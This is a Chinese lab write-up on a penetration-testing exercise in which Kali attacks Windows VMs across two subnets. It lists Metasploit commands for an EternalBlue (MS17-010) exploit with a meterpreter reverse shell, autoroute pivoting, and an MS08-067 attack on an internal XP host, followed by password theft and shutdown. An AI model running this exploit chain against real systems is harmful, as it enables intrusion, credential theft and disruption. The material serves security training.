一、实验项目名称
Windows网络服务渗透测试实战-跨网段攻击
二、实验目的及要求
掌握对跨网段攻击的方法。
熟悉Metasploit终端的使用方法。
熟悉通过meterpreter进行后渗透操作
获取winxp系统管理员admin的密码,并使xp系统关机
----基础配置----
1、选择win7
2、选择winXP
3、选择kali
4、查看kali的ip
5、查看winXP的ip
6、查看win7的IP
总结如下:
WinXP
| Win7
| Kali
|
| 网络适配器 桥接模式(自动)
192.168.43.99
| 网络适配器 桥接模式(自动)
192.168.43.89
| 网络适配器 NAT
192.168.232.128
| 网络适配器2 NAT
192.168.232.145
|
|
----开始跨网段攻击----
1、输入 msfconsole 启动metasploit
2、使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描
- use auxiliary/scanner/smb/smb_ms17_010 //进入扫描模块
- set rhosts (目标网段) //扫描目标网段内的主机
- set threads 512 //设置扫描线程
- run //执行
复制代码
3、设置攻击步骤进行攻击
- use exploit/windows/smb/ms17_010_eternalblue //利用攻击模块
- set rhost (目标IP) //设置目标IP
- set lhost (监听主机IP) //设置监听IP
- set payload windows/x64/meterpreter/reverse_tcp //设置攻击载荷
- run
复制代码 4、通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段
5、获取shell权限,在cmd窗口试图下输入 arp -a 可以发现,存在同网段的地址
6、返回meterpreter终端将内网网段192.168.232.128/24添加值路由表
- run autoroute -s 192.168.232.128/24
- run autoroute -p //查看路由表状况
复制代码
7.使用 background 退出到msf试图,并搜索 ms08-067 ,此处可以看到内网主机是XP系统,直接使用 ms08- 067 进行攻击
- backgroup
- search ms08-067
- use exploit/windows/smb/ms08_067_netapi //利用攻击模块
- set payload windows/meterpreter/bind_tcp //设置攻击载荷
- set rhost (目标IP) //设置监听IP
- run
复制代码
8、获取winxp系统管理员admin的密码
9、使xp系统关机
关机之后kali中会失去会话
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |